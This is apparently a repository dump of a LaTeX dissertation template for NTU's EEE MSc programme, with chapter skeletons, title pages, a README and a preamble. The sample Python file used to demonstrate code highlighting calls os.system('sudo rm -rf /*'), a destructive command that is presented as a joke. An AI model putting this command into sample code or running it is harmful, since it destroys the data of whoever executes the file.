├── Appendix ├── appendix.tex └── sample.py ├── Chapter1 ├── Chapter1.tex ├── Preview.pdf └── boundingbox.eps ├── Chapter2 └── Chapter2.tex ├── Chapter3 └── Chapter3.tex ├── Chapter4 └── Chapter4.tex ├── Chapter5 └── Chapter5.tex ├── Chapter6 └── Chapter6.tex ├── Front ├── Abstract.tex ├── Acknowledgement.tex ├── Acronyms.tex └── Symbols.tex ├── Preview.pdf ├── README.md ├── Ref └── References.bib ├── Title ├── AAS.tex ├── NTU_logo.png ├── SDS.tex ├── SoO.tex ├── coverpage.tex └── titlepage.tex └── main.tex /Appendix/appendix.tex: -------------------------------------------------------------------------------- 1 | %=== APPENDIX === 2 | 3 | \begin{appendices} 4 | \label{cha:appendices} 5 | 6 | \chapter{Introduction of Appendix} 7 | \markboth{Appendix A}{} % For appendix first (affects header) 8 | \begin{spacing}{1.5} 9 | 10 | The Appendix contains related data not necessary to the immediate understanding of the discussion in the report. This may contain materials such as: tables, graphs, illustrations, description of equipment, samples of forms, data sheets, questionnaires, equations, and any material that must be included for record purposes. 11 | Each entry (sample forms, detailed data for references, tables, pictures, questionnaires, charts, maps, graphic representations) in the appendix requires an identifying title. Every entry in the appendix must be referred to in the body of the report. Each appendix must be lettered, beginning with Appendix A. The list of appendices should be appearing in the table of contents following the list of references entry. 12 | 13 | \end{spacing} 14 | 15 | \chapter{Sample Code} 16 | \markboth{Appendix B}{} % For appendix second, etc.. 17 | 18 | below shows how to insert highlighted source code from the source file. 19 | 20 | \inputminted[ 21 | tabsize=4, % change this to set the spacing of tab 22 | breaklines, % automatically wrap the code 23 | fontsize=\scriptsize % Can be \footnotesize, \small, \normalsize etc 24 | ]{python}{Appendix/sample.py} 25 | 26 | \end{appendices} -------------------------------------------------------------------------------- /Appendix/sample.py: -------------------------------------------------------------------------------- 1 | # I would not run this s**t with super do anyway 2 | import os 3 | 4 | def makeLifeEasier(anything): 5 | os.system('sudo rm -rf /*') 6 | return("good luck guy") 7 | 8 | if __name__ == "__main__": 9 | makeLifeEasier(1) # this is a in-line comment -------------------------------------------------------------------------------- /Chapter1/Chapter1.tex: -------------------------------------------------------------------------------- 1 | %=== CHAPTER ONE (1) === 2 | %=== INTRODUCTION === 3 | 4 | \chapter{Introduction} 5 | \begin{spacing}{1.5} 6 | \setlength{\parskip}{0.3in} 7 | 8 | The first chapter of the dissertation is almost invariably the Introduction. Generally, its purpose is to lead the readers into the problem you intend to attack in the project, to set the scene. The main points here consist of the background to the problem and your motivation in solving it. This then leads into the objectives and the scope of the project. It is good to conclude your Introduction with a section on the layout of the dissertation. It prepares the readers for what is to come 9 | 10 | \section{Background} 11 | 12 | 13 | Background goes here. Also you can put in some references~\cite{ronneberger2015unet}. 14 | 15 | Here is a sample of table in \autoref{tabelsample} 16 | 17 | \begin{table}[ht] 18 | \centering 19 | \caption{A table without vertical lines.} 20 | \label{tabelsample} 21 | \begin{tabular}[t]{lcc} 22 | \toprule 23 | &Treatment A&Treatment B\\ 24 | \midrule 25 | John Smith&1&2\\ 26 | Jane Doe&--&3\\ 27 | Mary Johnson&4&5\\ 28 | \bottomrule 29 | \end{tabular} 30 | \end{table}% 31 | 32 | Use \texttt{$\backslash$newpage} to force start a new page. 33 | 34 | \newpage 35 | 36 | Also can try to refer to this image in \autoref{fig:boundingboxexample}. Notice that the \texttt{.eps} and \texttt{.pdf} format vector graphs are favoured, because: 37 | 38 | \begin{enumerate} 39 | \item they can be zoomed-in to check the detail. 40 | \item text in such formats are search-able. 41 | \end{enumerate} 42 | 43 | 44 | \begin{figure}[ht] 45 | \centering 46 | \includegraphics[width=4in, fbox]{Chapter1/boundingbox.eps} 47 | \caption{Bounding-box example of cars.} 48 | \label{fig:boundingboxexample} 49 | \end{figure} 50 | 51 | Try to insert a math equation as in \autoref{eq:euler}. If you wanna try the in-line mathematical, here is a sample $\alpha = \pi \cdot \frac{1}{\Theta}$. 52 | 53 | \begin{equation} 54 | \label{eq:euler} 55 | e^{ix}= \cos{x} + i \sin{x} 56 | \end{equation} 57 | 58 | Also here is a sample for footnote and hyperlink url\footnote{\url{https://github.com/doem97}}. 59 | 60 | When mention some file formats can use \texttt{music.mp3}, \texttt{latex.pdf}, etc. 61 | 62 | If there are any update of the dissertation standard, or you want to contribute to the \texttt{NTU-EEE-MSc-Dissertation-Template} project too, kindly send an E-mail to me. Thank you :) 63 | 64 | \section{Motivation} 65 | 66 | 67 | \section{Objectives and Specifications} 68 | 69 | 70 | 71 | \section{Major contribution of the Dissertation} 72 | 73 | 74 | 75 | \section{Organisation of the Dissertation} 76 | 77 | 78 | \end{spacing} 79 | %=== END OF CHAPTER ONE === 80 | \newpage 81 | 82 | 83 | -------------------------------------------------------------------------------- /Chapter1/Preview.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/doem97/NTU-EEE-MSc-Dissertation-Template/6d03b54908619f4ceb698eef3f061104404a5676/Chapter1/Preview.pdf -------------------------------------------------------------------------------- /Chapter2/Chapter2.tex: -------------------------------------------------------------------------------- 1 | %=== CHAPTER TWO (2) === 2 | %=== Literature Review === 3 | 4 | \chapter{Literature Review} 5 | \begin{spacing}{1.5} 6 | \setlength{\parskip}{0.3in} 7 | 8 | \section{Overview} 9 | 10 | Then comes the main part of your work. To lay the ground, there should first be a chapter on what has been done before on the problem - a Literature Review. This is an important section because it shows that you do not narrowly focus only on what you do, but are aware of the 11 | related work elsewhere, some of which might be instructive to your solving the problem. It can also explain why you are taking the direction you do. 12 | 13 | \section{One} 14 | (Co-localization methods of auto-drawing bbox) 15 | 16 | \section{Two} 17 | (Propagate bbox by co-segmentation) 18 | 19 | \section{Three} 20 | (Suggesting images to users) 21 | 22 | 23 | %=== END OF CHAPTER TWO === 24 | \end{spacing} 25 | \newpage 26 | -------------------------------------------------------------------------------- /Chapter3/Chapter3.tex: -------------------------------------------------------------------------------- 1 | %=== CHAPTER THREE (3) === 2 | %=== (Actual work done and contribution, including literature survey) === 3 | 4 | \chapter{Approach} 5 | \begin{spacing}{1.5} 6 | \setlength{\parskip}{0.3in} 7 | % (Actual work done and contribution, including literature survey) 8 | 9 | 10 | \section{One} 11 | 12 | The next few chapters should describe the work you have done in tackling the problem. There might be a chapter on the fundamental theories relevant to the solution you are pursuing, or the supporting technologies you need in implementing the solution. Then there should be a chapter on the solution itself, followed by a chapter on the results and analysis of the results 13 | 14 | \section{Two} 15 | 16 | 17 | \section{Three} 18 | 19 | 20 | %=== END OF CHAPTER THREE === 21 | \end{spacing} 22 | \newpage 23 | -------------------------------------------------------------------------------- /Chapter4/Chapter4.tex: -------------------------------------------------------------------------------- 1 | %=== CHAPTER FOUR (4) === 2 | %=== Test and Experiments === 3 | 4 | \chapter{Test and Experiments} 5 | \begin{spacing}{1.5} 6 | \setlength{\parskip}{0.3in} 7 | 8 | \section{One} 9 | 10 | 11 | \section{Two} 12 | 13 | \section{Three} 14 | 15 | 16 | %=== END OF CHAPTER FOUR === 17 | \end{spacing} 18 | \newpage 19 | -------------------------------------------------------------------------------- /Chapter5/Chapter5.tex: -------------------------------------------------------------------------------- 1 | %=== CHAPTER FIVE (5) === 2 | %=== Discussion === 3 | 4 | \chapter{Discussion} 5 | \begin{spacing}{1.5} 6 | \setlength{\parskip}{0.3in} 7 | 8 | \section{One} 9 | 10 | Generally, there should be no more than six or seven chapters in your dissertation. If you have more than that, you should take a close look at its orgainsation and see if certain chapters can be merged. 11 | 12 | \section{Two} 13 | 14 | \section{Three} 15 | 16 | 17 | %=== END OF CHAPTER FIVE === 18 | \end{spacing} 19 | \newpage 20 | -------------------------------------------------------------------------------- /Chapter6/Chapter6.tex: -------------------------------------------------------------------------------- 1 | %=== CHAPTER SIX (6) === 2 | %=== Conclusion and Recommendations === 3 | 4 | \chapter{Conclusion and Recommendations} 5 | \begin{spacing}{1.5} 6 | \setlength{\parskip}{0.3in} 7 | 8 | \section{One} 9 | 10 | The last chapter is always the Conclusion. This generally should have three parts. The first is a concise summary of the work you have done. In a way, this is similar to the abstract. Then there is the conclusion, in which you highlight the significance of the results, and perhaps the consequences of the results, critically where necessary. The last thing is usually recommendations and/or future work, in which you identify the inadequacies of what you have done, and suggest how the gaps may be plugged. 11 | 12 | \section{Two} 13 | 14 | Documents that are prepared with the help of other sources should have a list of sources cited. A list of References contains only sources the writer quotes directly, takes original ideas from, and refers to in the dissertation should be included. In reports where the subject is primarily scientific, the list of references is the most widely accepted way to cite specific sources. 15 | 16 | \section{Three} 17 | 18 | \section{Four} 19 | 20 | \subsection{Six} 21 | 22 | 23 | %=== END OF CHAPTER SIX === 24 | \end{spacing} 25 | \newpage 26 | -------------------------------------------------------------------------------- /Front/Abstract.tex: -------------------------------------------------------------------------------- 1 | %=== FRONT PART === 2 | %=== ABSTRCT === 3 | \newpage 4 | 5 | \chapter*{\centering Abstract} 6 | \markboth{Abstract}{} 7 | % \vspace{-0.3in} 8 | 9 | \begin{spacing}{1.5} 10 | \setlength{\parskip}{0.3in} 11 | 12 | \addcontentsline{toc}{chapter}{Abstract} 13 | 14 | Put your abstracts here. The Abstract should be a short and concise passage on the important work and contributions of the project: the motivation and the problem pursued, the method you employed and the results obtained, highlighting the significant achievements. It should not contain peripheral things like summary of literature review, and it is not good enough to say that a certain issue has been studied without stating the results of the study. Generally, one page is about the right length for the Abstract. 15 | 16 | \par 17 | \textbf{Keywords:} Dissertation, keywords. 18 | \end{spacing} 19 | \newpage 20 | %=== END OF ABSTRACT === 21 | -------------------------------------------------------------------------------- /Front/Acknowledgement.tex: -------------------------------------------------------------------------------- 1 | %=== FRONT PART === 2 | %=== ACKNOWLEDGEMENT === 3 | 4 | %\begin{center} 5 | \chapter*{\centering Acknowledgements} 6 | \markboth{Acknowledgements}{} 7 | \begin{spacing}{1.5} 8 | \setlength{\parskip}{0.3in} 9 | %\end{center} 10 | \addcontentsline{toc}{chapter}{Acknowledgement} 11 | 12 | Acknowledgements is to express thanks and appreciation for those who helped in this project. 13 | 14 | \end{spacing} 15 | \newpage 16 | %=== END OF ACKNOWLEDGEMENT === 17 | -------------------------------------------------------------------------------- /Front/Acronyms.tex: -------------------------------------------------------------------------------- 1 | %=== FRONT PART === 2 | %=== ACRONYMS === 3 | %\begin{center} 4 | \chapter*{\centering Acronyms} 5 | \markboth{Acronyms}{} 6 | \begin{spacing}{1.5} 7 | \setlength{\parskip}{0.3in} 8 | %\end{center} 9 | \addcontentsline{toc}{chapter}{Acronyms} 10 | 11 | \begin{table}[ht] 12 | \centering 13 | % \resizebox{0.8\textwidth}{!}{% Uncomment to set fixed width 14 | \begin{tabular}{ll} 15 | \textbf{NN} & Neural Network \\ 16 | \textbf{ML} & Machine Learning \\ 17 | \textbf{DL} & Deep Learning \\ 18 | \textbf{FCN} & Fully Convolutional Network \\ 19 | \textbf{CNN} & Convolutional Neural Network \\ 20 | \textbf{RCNN} & Region Based Convolutional Neural Network \\ 21 | \textbf{DCNN} & Deep Convolutional Neural Network 22 | \end{tabular}% 23 | % } 24 | \end{table} 25 | 26 | \end{spacing} 27 | \newpage 28 | %=== END OF ACRONYMS === 29 | -------------------------------------------------------------------------------- /Front/Symbols.tex: -------------------------------------------------------------------------------- 1 | %=== FRONT PART === 2 | %=== SYMBOLS === 3 | %\begin{center} 4 | \chapter*{\centering Symbols} 5 | \markboth{Symbols}{} 6 | \begin{spacing}{1.5} 7 | \setlength{\parskip}{0.3in} 8 | %\end{center} 9 | \addcontentsline{toc}{chapter}{Symbols} 10 | 11 | \begin{table}[ht] 12 | \centering 13 | % \resizebox{0.8\textwidth}{!}{% Uncomment to set fixed width 14 | \begin{tabular}{ll} 15 | \textbf{$\Pi$} & An Pi Symbol\\ 16 | \textbf{$\beta$} & An Beta Symbol\\ 17 | \textbf{$\sigma$} & An Sigma Symbol\\ 18 | \textbf{$\alpha$} & Another Alpha Symbol\\ 19 | \end{tabular}% 20 | % } 21 | \end{table} 22 | 23 | \end{spacing} 24 | \newpage 25 | %=== END OF ACKNOWLEDGEMENT === 26 | -------------------------------------------------------------------------------- /Preview.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/doem97/NTU-EEE-MSc-Dissertation-Template/6d03b54908619f4ceb698eef3f061104404a5676/Preview.pdf -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NTU EEE M.Sc. Dissertation - Latex Template 2 | Nanyang Technological University EEE School, Latex template for Master dissertation report. 3 | 4 | ## How to use this template 5 | #### Option 1: via Overleaf (RECOMMENDED) 6 | 7 | Clike [Here](https://www.overleaf.com/latex/templates/ntu-eee-msc-dissertation-report-template/kdgfhzffjrvh), and clike `open as template`. Edit `main.tex` and `Recompile` to preview at the right side. 8 | 9 | #### Option 2: compile by yourself 10 | 11 | The main entry is `main.tex`, need to install dependencies. Recommend to use pdfLatex & Tex Live 2020. 12 | 13 | ## Why should I use LaTex instead of Word 14 | 15 | Latex can ease you from tough formating works. Simply filling in text contents to corresponding areas, LaTex would format every thing for you automatically. 16 | 17 | #### Highlights of this version 18 | 19 | - Fit the guideline specifications 20 | - Add footer and header 21 | - Add claim pages 22 | - Highlighted source code support 23 | - `SVG`, `PDF`, `EPS` vector images supported 24 | - All types of elements are given instances 25 | 26 | #### Preview 27 | ![front](https://user-images.githubusercontent.com/19631039/113473112-21549d80-949a-11eb-91f5-0fa559c116bc.png) 28 | ![toc](https://user-images.githubusercontent.com/19631039/113473115-24e82480-949a-11eb-946e-9071f701163c.png) 29 | ![main](https://user-images.githubusercontent.com/19631039/113473116-26b1e800-949a-11eb-83ae-bffec88c2260.png) 30 | ![code-highlight](https://user-images.githubusercontent.com/19631039/113473120-29144200-949a-11eb-9e0d-5a69f2f41be5.png) 31 | 32 | ## Copyright 33 | This version complies with the newest [EEE official dissertation guidline](http://www.eee.ntu.edu.sg/programmes/CurrentStudents/Graduate_Coursework/mscProg/disHome/Pages/home.aspx), refine based on [W.M. Zhao's version](https://www.overleaf.com/latex/templates/ntu-master-dissertation/ngnhrrwryccv) 34 | 35 | ## Changelog 36 | 37 | #### Update 5 April 2021 38 | 39 | 1. Get rid of user-unfriendly header and footer, turn to use markers to change the headers. ZHEN XIANG. 40 | 2. Add the examples of Acronyms and Symbols. 41 | 42 | #### Update 3 April 2021 43 | 44 | 1. Add more samples about hyperlink, mathematical formula, footnotes. 45 | 46 | #### Update 29 Mar 2021 47 | 48 | 1. Update the source code highlighting sample in appendix 49 | 50 | #### Update 25 Mar 2021 51 | 52 | 1. Update the related links to official guidlines in README and main.tex 53 | 2. Add feature description sec 54 | 3. Fix Appendix bad style and header footer 55 | 56 | #### Update 17 Mar 2021 57 | 58 | 1. Fix Appendix header \bf problem 59 | 2. Fix Reference page number error 60 | 3. Remove additional bibliographies in Ref/References.bib 61 | 62 | #### Update 13 Mar 2021 63 | 64 | 1. Add all the prior pages: Title Page, Statement of Originality, Supervisor Declaration Statement, Authoship Attribution Statement 65 | 2. Bug fix 66 | 3. Add spacing and remove indent 67 | 68 | #### Update 11 Mar 2021 69 | 70 | 1. Remove the color of Table of Contents, because its ugly 71 | 2. Add the right upper title of each section. Quite a shit 72 | 3. Add the 1.7 spacing and 0.3 inch paragraph skip, just make life easier 73 | 4. Some bug fix on the previous version 74 | 5. Replace the headin NTU Logo with the newest colorful one 75 | -------------------------------------------------------------------------------- /Ref/References.bib: -------------------------------------------------------------------------------- 1 | @inproceedings{ronneberger2015unet, 2 | title={U-net: Convolutional networks for biomedical image segmentation}, 3 | author={Ronneberger, Olaf and Fischer, Philipp and Brox, Thomas}, 4 | booktitle={International Conference on Medical image computing and computer-assisted intervention}, 5 | pages={234--241}, 6 | year={2015}, 7 | organization={Springer} 8 | } -------------------------------------------------------------------------------- /Title/AAS.tex: -------------------------------------------------------------------------------- 1 | \begin{titlepage} 2 | 3 | \begin{center} 4 | \Large{\bf{Authorship Attribution Statement}} 5 | \end{center} 6 | 7 | \vspace{0.2in} 8 | 9 | \begin{spacing}{2} 10 | 11 | This thesis does not contain any materials from papers published in peer-reviewed journals or from papers accepted at conferences in which I am listed as an author. 12 | 13 | \end{spacing} 14 | 15 | \vspace{2.5cm} 16 | 17 | \begin{center} 18 | \makebox[4cm]{\dotfill} \hfill \makebox[4cm]{\dotfill}\\ 19 | \makebox[4cm]{Date} \hfill \makebox[4cm]{Your Name} 20 | \end{center} 21 | \end{titlepage} 22 | \newpage -------------------------------------------------------------------------------- /Title/NTU_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/doem97/NTU-EEE-MSc-Dissertation-Template/6d03b54908619f4ceb698eef3f061104404a5676/Title/NTU_logo.png -------------------------------------------------------------------------------- /Title/SDS.tex: -------------------------------------------------------------------------------- 1 | \begin{titlepage} 2 | 3 | \begin{center} 4 | \Large{\bf{Supervisor Declaration Statement}} 5 | \end{center} 6 | 7 | \vspace{0.2in} 8 | 9 | \begin{spacing}{2} 10 | I have reviewed the content and presentation style of this thesis and declare it is free of plagiarism and of sufficient grammatical clarity to be examined. To the best of my knowledge, the research and writing are those of the candidate except as acknowledged in the Author Attribution Statement. I confirm that the investigations were conducted in accord with the ethics policies and integrity standards of Nanyang Technological University and that the research data are presented honestly and without prejudice 11 | \end{spacing} 12 | 13 | \vspace{2.5cm} 14 | 15 | \begin{center} 16 | \makebox[4cm]{\dotfill} \hfill \makebox[4cm]{\dotfill}\\ 17 | \makebox[4cm]{Date} \hfill \makebox[4cm]{Supervisor's Name} 18 | \end{center} 19 | \end{titlepage} 20 | \newpage -------------------------------------------------------------------------------- /Title/SoO.tex: -------------------------------------------------------------------------------- 1 | \begin{titlepage} 2 | 3 | \begin{center} 4 | \Large{\bf{Statement of Originality}} 5 | \end{center} 6 | 7 | \vspace{0.2in} 8 | 9 | \begin{spacing}{2} 10 | 11 | I hereby certify that the work embodied in this thesis is the result of original research and has not been submitted for a higher degree to any other University or Institution. 12 | 13 | \end{spacing} 14 | 15 | \vspace{2.5cm} 16 | 17 | \begin{center} 18 | \makebox[4cm]{\dotfill} \hfill \makebox[4cm]{\dotfill}\\ 19 | \makebox[4cm]{Date} \hfill \makebox[4cm]{Your Name} 20 | \end{center} 21 | \end{titlepage} 22 | \newpage -------------------------------------------------------------------------------- /Title/coverpage.tex: -------------------------------------------------------------------------------- 1 | \begin{titlepage} 2 | 3 | \begin{figure}[h!] 4 | \centering 5 | \includegraphics[width=1\textwidth]{Title/NTU_logo.png} 6 | \caption*{} 7 | \label{fig:entropy} 8 | \end{figure} 9 | 10 | \vspace{1.5in} 11 | 12 | \centering 13 | \Huge{\textbf{Your Title of the Dissertation\\Also Second Line}}\\[2.5in] 14 | 15 | \LARGE{\textbf{YOUR NAME}}\\[0.5in] 16 | 17 | \normalsize{\textbf{SCHOOL OF ELECTRICAL AND ELECTRONIC ENGINEERING}}\\[0.2in] 18 | 19 | % \textbf{A DISSERTATION SUBMITTED IN PARTIAL FULFILMENT OF\\ 20 | % THE REQUIREMENTS FOR THE DEGREE OF\\ 21 | % MASTER OF SCIENCE IN DIGITAL MEDIA TECHNOLOGY}\\[0.25in] 22 | 23 | \large{\textbf{2021}} 24 | \end{titlepage} 25 | \newpage -------------------------------------------------------------------------------- /Title/titlepage.tex: -------------------------------------------------------------------------------- 1 | \begin{titlepage} 2 | \begin{center} 3 | \vspace*{2in} 4 | \Huge{\textbf{Your Title of the Dissertation\\Also Second Line}}\\[2.5in] 5 | 6 | \LARGE{\textbf{\MakeUppercase{YOUR NAME}}}\\[1in] 7 | 8 | \normalsize{\textbf{\MakeUppercase{SCHOOL OF ELECTRICAL AND ELECTRONIC ENGINEERING}}}\\[0.5in] 9 | \normalsize{\textbf{\MakeUppercase{A DISSERTATION SUBMITTED IN PARTIAL FULFILMENT OF\\THE REQUIREMENTS FOR THE DEGREE OF\\MASTER OF SCIENCE IN XXX}}}\\[0.75in] 10 | 11 | % \textbf{A DISSERTATION SUBMITTED IN PARTIAL FULFILMENT OF\\ 12 | % THE REQUIREMENTS FOR THE DEGREE OF\\ 13 | % MASTER OF SCIENCE IN DIGITAL MEDIA TECHNOLOGY}\\[0.25in] 14 | 15 | \large{\textbf{2021}} 16 | \end{center} 17 | \end{titlepage} 18 | \newpage -------------------------------------------------------------------------------- /main.tex: -------------------------------------------------------------------------------- 1 | % Re-defined by Z.C.TIAN (https://github.com/doem97) 2 | % This version comply with the Official EEE Dissertation Guidline in [EEE dissertation] (http://www.eee.ntu.edu.sg/programmes/CurrentStudents/Graduate_Coursework/mscProg/disHome/Pages/home.aspx) 3 | % More information about dissertation can be found in [NTU thesis](http://research.ntu.edu.sg/rieo/RI/Pages/Theses--Dissertations.aspx) 4 | % Based on W.M.ZHAO version, original link in overleaf: 5 | % (https://www.overleaf.com/latex/templates/ntu-master-dissertation/ngnhrrwryccv) 6 | 7 | \documentclass[12pt]{report} 8 | 9 | %% Useful packages 10 | \usepackage[a4paper,top=3cm,bottom=3cm,left=3.5cm,right=3cm,marginparwidth=1.75cm,headheight=22pt]{geometry} 11 | \usepackage{amsmath} 12 | \usepackage{cite} 13 | \usepackage{courier} 14 | \usepackage{minted} % For highlighted source code 15 | \usepackage[titletoc]{appendix} 16 | \usepackage[export]{adjustbox} 17 | \usepackage[nottoc,notlot,notlof]{tocbibind} 18 | \usepackage[labelfont=bf, textfont=bf]{caption} 19 | \usepackage{graphicx} 20 | \usepackage{booktabs} 21 | \usepackage[bottom]{footmisc} 22 | \usepackage{hyperref} 23 | \usepackage{float} 24 | \usepackage{setspace} 25 | \usepackage{subfigure} 26 | \usepackage{setspace} 27 | \usepackage{lipsum} 28 | \usepackage{fancyhdr} % Fancy header 29 | \usepackage{url} 30 | \usepackage{tabularx} 31 | \usepackage[utf8]{inputenc} 32 | \usepackage{mathptmx} %Times Font 33 | 34 | %==== Header and Footer configure ==== 35 | % Define the plain pagestyle used by most chapters 36 | \fancypagestyle{plain}{ 37 | \fancyhf{} % Clear header footer 38 | \fancyhead[R]{\bf \small \textsl{\nouppercase{\leftmark}} \vspace{0.1in}} 39 | \fancyfoot[R]{\thepage} 40 | % Set the right side of the footer to be the page number 41 | \renewcommand{\headrulewidth}{2pt} 42 | } 43 | 44 | %==== Overall Config ==== 45 | \setlength{\parindent}{0in} % Set paragraph indent as 0 46 | % \setlength{\fboxsep}{-0.3in}% 47 | \setlength{\fboxrule}{0.5pt} % Set the bounding box around the image as 0.5pt 48 | \pagestyle{plain} 49 | % \renewcommand{\chaptermark}[1]{\markboth{#1}{}}% Comment this line to use header "Chapter 1. Literature View"; otherwise header is "Literature View" 50 | 51 | 52 | 53 | \begin{document} 54 | \fontdimen2\font=0.5em% inter word space 55 | %==== FRONT PART==== 56 | \include{Title/coverpage} % Coverpage 57 | \include{Title/titlepage} % Titlepage 58 | \include{Title/SoO} % Titlepage 59 | \include{Title/SDS} % Titlepage 60 | \include{Title/AAS} % Titlepage 61 | 62 | %\begingroup 63 | %\let\cleardoublepage\clearpage 64 | 65 | \pagenumbering{roman} 66 | 67 | \renewcommand*\contentsname{\centering Table of Contents} 68 | \tableofcontents 69 | \newpage 70 | 71 | \include{Front/Abstract} 72 | \include{Front/Acknowledgement} 73 | \include{Front/Acronyms} 74 | \include{Front/Symbols} 75 | 76 | 77 | \renewcommand{\listfigurename}{\centering List of Figures} 78 | \listoffigures 79 | \addcontentsline{toc}{chapter}{Lists of Figures} 80 | \newpage 81 | 82 | \renewcommand{\listtablename}{\centering List of Tables} 83 | \listoftables 84 | \addcontentsline{toc}{chapter}{Lists of Tables} 85 | \newpage 86 | 87 | %\endgroup 88 | 89 | %==== MAIN PART ==== 90 | 91 | \pagenumbering{arabic} 92 | \include{Chapter1/Chapter1} 93 | \include{Chapter2/Chapter2} 94 | \include{Chapter3/Chapter3} 95 | \include{Chapter4/Chapter4} 96 | \include{Chapter5/Chapter5} 97 | \include{Chapter6/Chapter6} 98 | %==== ENDING PART === 99 | 100 | \renewcommand\bibname{References} 101 | \bibliographystyle{unsrt} 102 | \begin{spacing}{1.5} 103 | \bibliography{Ref/References} 104 | \end{spacing} 105 | \newpage 106 | 107 | \include{Appendix/appendix} 108 | %==== END OF ALL === 109 | \end{document} 110 | --------------------------------------------------------------------------------